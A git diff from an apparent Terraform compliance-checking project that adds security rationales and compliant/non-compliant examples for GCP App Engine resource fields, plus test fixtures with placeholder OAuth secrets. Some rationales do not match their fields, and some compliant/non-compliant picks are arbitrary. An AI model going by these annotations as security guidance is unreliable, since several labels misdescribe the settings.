b/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json index a27e0659d..10d656b0a 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json @@ -5,17 +5,17 @@ "service": { "description": "The name of the service these settings apply to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure that traffic splitting configurations are explicitly mapped to the correct logical microservice.", + "compliant": "hardhat-main-api", + "non-compliant": "generic-api", "parent": null }, "split": { "description": "Mapping that defines fractional HTTP traffic diversion to different versions within the service. Structure is [documented below](#nested_split).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To ensure that traffic distribution is managed as code and providing an automated way to transition users to new versions while maintaining a clear record of routing logic.", "compliant": null, "non-compliant": null, "parent": null, @@ -23,19 +23,19 @@ "shard_by": { "description": "Mechanism used to determine which version a request is sent to. The traffic selection algorithm will be stable for either type until allocations are changed. Possible values are: `UNSPECIFIED`, `COOKIE`, `IP`, `RANDOM`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define how traffic is distributed through versions, ensuring that users have a consistent experience by consistently routing them to the same version based on their IP address.", + "compliant": "IP", + "non-compliant": "RANDOM", "parent": "split" }, "allocations": { "description": "Mapping from version IDs within the service to fractional (0.000, 1] allocations of traffic for that version. Each version can be specified only once, but some versions in the service may not have any traffic allocation. Services that have traffic allocated cannot be deleted until either the service is deleted or their traffic allocation is removed. Allocations must sum to 1. Up to two decimal place precision is supported for IP-based splits and up to three decimal places is supported for cookie-based splits.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring to provide precise control over the percentage of traffic directed to specific versions.", + "compliant": "v1 = 0.8 v2 = 0.2", + "non-compliant": "v1 = 0.0 v2 = 1.0", "parent": "split" } } @@ -43,17 +43,17 @@ "migrate_traffic": { "description": "If set to true traffic will be migrated to this version.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Allowing to ensure the system to warm up new instances and preventing sudden latency spikes for users during a deployment.", + "compliant": "false", + "non-compliant": "true", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json b/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json index a97986370..8b683328f 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json @@ -5,17 +5,17 @@ "runtime": { "description": "Desired runtime. Example python27.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring the application executes in the correct environment with the specific language version required for its dependencies.", + "compliant": "nodejs20", + "non-compliant": "nodejs10", "parent": null }, "deployment": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To define the specific source code and files that constitute the application version ensuring that Terraform can verify and upload the correct assets to the environment.", "compliant": null, "non-compliant": null, "parent": null, @@ -23,8 +23,8 @@ "zip": { "description": "Zip File Structure is [documented below](#nested_deployment_zip).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Provides a direct way to package the application's source code.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -32,8 +32,8 @@ "files": { "description": "Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To simplify the configuration and ensure that the application package is deployed as a single consistent unit rather than managing individual file paths manually.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -43,8 +43,8 @@ "entrypoint": { "description": "The entrypoint for the application. Structure is [documented below](#nested_entrypoint).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To provide the specific command required to start the application, ensuring that the environment knows how to execute the code, with which port/startup script to initialize.", "compliant": null, "non-compliant": null, "parent": null, @@ -52,10 +52,10 @@ "shell": { "description": "The format should be a shell command that can be fed to bash -c.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define the startup command, as it allows for the execution of complex scripts/multiple commands within the standard shell environment.", + "compliant": "node ./app.js", + "non-compliant": "bash ./app.js", "parent": "entrypoint" } } @@ -63,17 +63,17 @@ "service": { "description": "AppEngine service resource", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring the application is deployed as a specific microservice, allowing for independent scaling and routing logic within the larger App Engine project.", + "compliant": "default", + "non-compliant": "unauthorized-app-name", "parent": null }, "version_id": { "description": "Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,\"default\", \"latest\", and any name with the prefix \"ah-\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To automatically generate unique timestamp identifiers for each deployment, inturn preventing naming conflicts and ensuring that new releases do not accidentally overwrite existing versions.", "compliant": null, "non-compliant": null, "parent": null @@ -81,8 +81,8 @@ "service_account": { "description": "The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Having utilise the default App Engine service account, simplifying permission management by leveraging the standard identity provided by the platform for accessing Google Cloud resources.", "compliant": null, "non-compliant": null, "parent": null @@ -90,8 +90,8 @@ "threadsafe": { "description": "Whether multiple requests can be dispatched to this version at once.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Environment to use its default concurrency settings, ensuring the application remains stable and avoids race conditions if the codebase is not optimized for parallel request handling.", "compliant": null, "non-compliant": null, "parent": null @@ -99,8 +99,8 @@ "app_engine_apis": { "description": "Allows App Engine second generation runtimes to access the legacy bundled services.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the application remains modern and portable", "compliant": null, "non-compliant": null, "parent": null @@ -108,8 +108,8 @@ "runtime_api_version": { "description": "The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The application utilises a second-generation runtime where the API version is automatically managed by the platform, ensuring the environment always uses the most compatible interface without manual intervention.", "compliant": null, "non-compliant": null, "parent": null @@ -117,8 +117,8 @@ "handlers": { "description": "An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "For a more flexible and unified approach to request handling without platform-specific configuration.", "compliant": null, "non-compliant": null, "parent": null, @@ -191,8 +191,8 @@ "libraries": { "description": "Configuration for third-party Python runtime libraries that are required by the application. Structure is [documented below](#nested_libraries).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Uses a second-generation runtime that manages dependencies through standard package managers.", "compliant": null, "non-compliant": null, "parent": null, @@ -220,8 +220,8 @@ "env_variables": { "description": "Environment variables available to the application.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid hardcoding sensitive/environment-specific data in the deployment manifest.", "compliant": null, "non-compliant": null, "parent": null @@ -229,8 +229,8 @@ "vpc_access_connector": { "description": "Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "interacts with public APIs/managed services that do not require a private connection to a Virtual Private Cloud which reduces infrastructure complexity.", "compliant": null, "non-compliant": null, "parent": null, @@ -258,8 +258,8 @@ "inbound_services": { "description": "A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Does not require specialised App Engine-specific features, allowing it to remain a standard web service with a smaller configuration footprint.", "compliant": null, "non-compliant": null, "parent": null @@ -267,17 +267,17 @@ "instance_class": { "description": "Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G BasicScaling or ManualScaling: B1, B2, B4, B4_1G, B8 Defaults to F1 for AutomaticScaling and B2 for ManualScaling and BasicScaling. If no scaling is specified, AutomaticScaling is chosen.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Defined to ensure the application has the specific CPU and memory resources required for its workload.", + "compliant": "F1", + "non-compliant": "F2", "parent": null }, "automatic_scaling": { "description": "Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To prevent the application from scaling up to aggressively during minor traffic fluctuations.", "compliant": null, "non-compliant": null, "parent": null, @@ -341,8 +341,8 @@ "basic_scaling": { "description": "Basic scaling creates instances when your application receives requests. Each instance will be shut down when the application becomes idle. Basic scaling is ideal for work that is intermittent or driven by user activity. Structure is [documented below](#nested_basic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid the latency delays in relation with starting instances from zero after periods of inactivity.", "compliant": null, "non-compliant": null, "parent": null, @@ -370,8 +370,8 @@ "manual_scaling": { "description": "A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the system can instead respond dynamically to traffic changes without the risk of over-provisioning/service outages during unexpected load.", "compliant": null, "non-compliant": null, "parent": null, @@ -389,36 +389,36 @@ }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null }, "noop_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the application version will not be deleted.", + "required": false, + "security_impact": false, + "rationale": "To ensure Terraform can fully decommission the application version.", "compliant": null, "non-compliant": null, "parent": null }, "delete_service_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the service will be deleted if it is the last version.", + "required": false, + "security_impact": false, + "rationale": "Prevent the accidental removal of the entire service and its versions when a specific version is decommissioned.", "compliant": null, "non-compliant": null, "parent": null }, "zip": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Zip", + "required": false, + "security_impact": true, + "rationale": "Provides a direct way to package the application's source code.", "compliant": null, "non-compliant": null, "parent": null, @@ -426,10 +426,10 @@ "source_url": { "description": "Source URL", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring that the deployment process uses a verified artifact that is consistent across all environments.", + "compliant": "https://storage.googleapis.com/appengine-static-content/hello-world.zip", + "non-compliant": "https://storage.googleapis.com/malicious-bucket/exploit.zip", "parent": "zip" }, "files_count": { diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl new file mode 100644 index 000000000..83b50a830 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.14.0" + hashes = [ + "h1:Rq4R8clqn9QByUbg3ZUc0bnvUalIphJTxOanUeD7y9Q=", + "zh:0dc10c3bbb58a532eb2e1f146af2bbb0748c2d4229d4c3809aeb0e3659159f26", + "zh:1d03027fad0ba6c9adca7ec69f29672084e589c5a5cfe5e81ffac572eeff7ebf", + "zh:50595efb23deec9fbac47441ba53ad20e9bc9218458475d68d668c3270ab6f58", + "zh:5a63cead67c76efeef8f821c064653fd4fc00cfc83ea6b1cd96d648346a818b2", + "zh:62057d22a94072123e6b63cd256e6cce88565b63363edbe508a44412b4707e9f", + "zh:661e90a6433bcf65f18d7064bbaa37ec6eec74e9f93c36a2ba9d11df90c0da55", + "zh:a4d11fa451ac562c4eea8b82aea6722dcfa0259f67b0cc94b05ed82cd9abc995", + "zh:dd82e44e83c13a34fa04f1c38024bf1d9a6a5496a165be16da3111db553fb3d7", + "zh:e88edd18f4102e24191384f4dddb56e8ed9235cd4feeea202f8da0fe001ec3ff", + "zh:ec7bf788161013bb0cf6a9394f9c5ddd8dc4d24f233a12a23b1be632d979d443", + "zh:f2d88ef4c8c88b9723cd9cef14d37c6461b36c3475a394e69e0c0156157b678a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/c.tf b/inputs/gcp/app_engine/app_engine_application/database_type/c.tf new file mode 100644 index 000000000..4981324c3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/c.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "c" { + project = "gcp-test-project" + location_id = "us-central" + database_type = "CLOUD_FIRESTORE" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/config.tf b/inputs/gcp/app_engine/app_engine_application/database_type/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf b/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf new file mode 100644 index 000000000..2764d470c --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-test-project" + location_id = "us-central" + database_type = "CLOUD_DATASTORE_COMPATIBILITY" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/plan.json b/inputs/gcp/app_engine/app_engine_application/database_type/plan.json new file mode 100644 index 000000000..a4e352ff3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/database_type/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf new file mode 100644 index 000000000..4e8698f79 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + feature_settings { + split_health_checks = true + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf new file mode 100644 index 000000000..082ede499 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + feature_settings { + split_health_checks = false + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json new file mode 100644 index 000000000..ee7e949c3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf new file mode 100644 index 000000000..70c2413cc --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "c" { + project = "my-project" + location_id = "us-central" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "secret-value" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf new file mode 100644 index 000000000..c9ae2fa2c --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "nc" { + project = "my-project" + location_id = "us-central" + + iap { + oauth2_client_id = "incorrect-client-id.apps.googleusercontent.com" + oauth2_client_secret = "secret-value" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json new file mode 100644 index 000000000..fa0a3a999 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf new file mode 100644 index 000000000..0f04c2318 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "GOCSPX-abc123def456_actual_secret" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf new file mode 100644 index 000000000..9932ccdc2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "12345" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json new file mode 100644 index 000000000..710cf4d6b Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl new file mode 100644 index 000000000..894abb857 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.12.0" + hashes = [ + "h1:vd1110nYSvbUdAM3MDtQD97ikZvuyDgKExlzTwutYqw=", + "zh:38722ec7777543c23e22e02695e53dd5c94644022647c3c79e11e587063d4d2b", + "zh:417b12b69c91c12e3fcefee38744b7a37bae73b706e3071c714151a623a6b0e9", + "zh:4902cea92c78b462beaf053de03d0d55fb2241d41ca3379b4568ba247f667fa9", + "zh:50ccce39d403ba477943e6652ccb6913092d9dcce1d55533b00b66062888db3d", + "zh:56dccfe5df28cfe368d93c37ad6c46a16e76da61482fd0bfc83676b1423cecf5", + "zh:7265fca2921e5e300da5d8de7e28b658c0863fdda9da696c5b97dbd3122c17c2", + "zh:8317467e828178a6db9ddabe431bb13935c00bfb5e4b4d9760bd56f7ae596eca", + "zh:84cc9d9277422a0d6c80d2bd204642d8776ddbba23feb94cf2760bb5f15410bc", + "zh:8f79d72e7ed4e36d01560ce5fc944dc7e0387fa0f8272a4345fc6ae896e8f575", + "zh:98c3d756beca036f84e7840e2099ff7359e9a246cd9a35386e03ce65032b3f5f", + "zh:a07e3ca19673d28da9289ca28dfb83204fa6636f642b8cf46de8caaf526b7dde", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/c.tf b/inputs/gcp/app_engine/app_engine_application/location_id/c.tf new file mode 100644 index 000000000..1717deddb --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/c.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "c" { + project = "gcp-test-project" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/config.tf b/inputs/gcp/app_engine/app_engine_application/location_id/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf b/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf new file mode 100644 index 000000000..74d9d52b0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-test-project" + location_id = "europe-west1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/plan.json b/inputs/gcp/app_engine/app_engine_application/location_id/plan.json new file mode 100644 index 000000000..b3b6c5110 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/location_id/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + 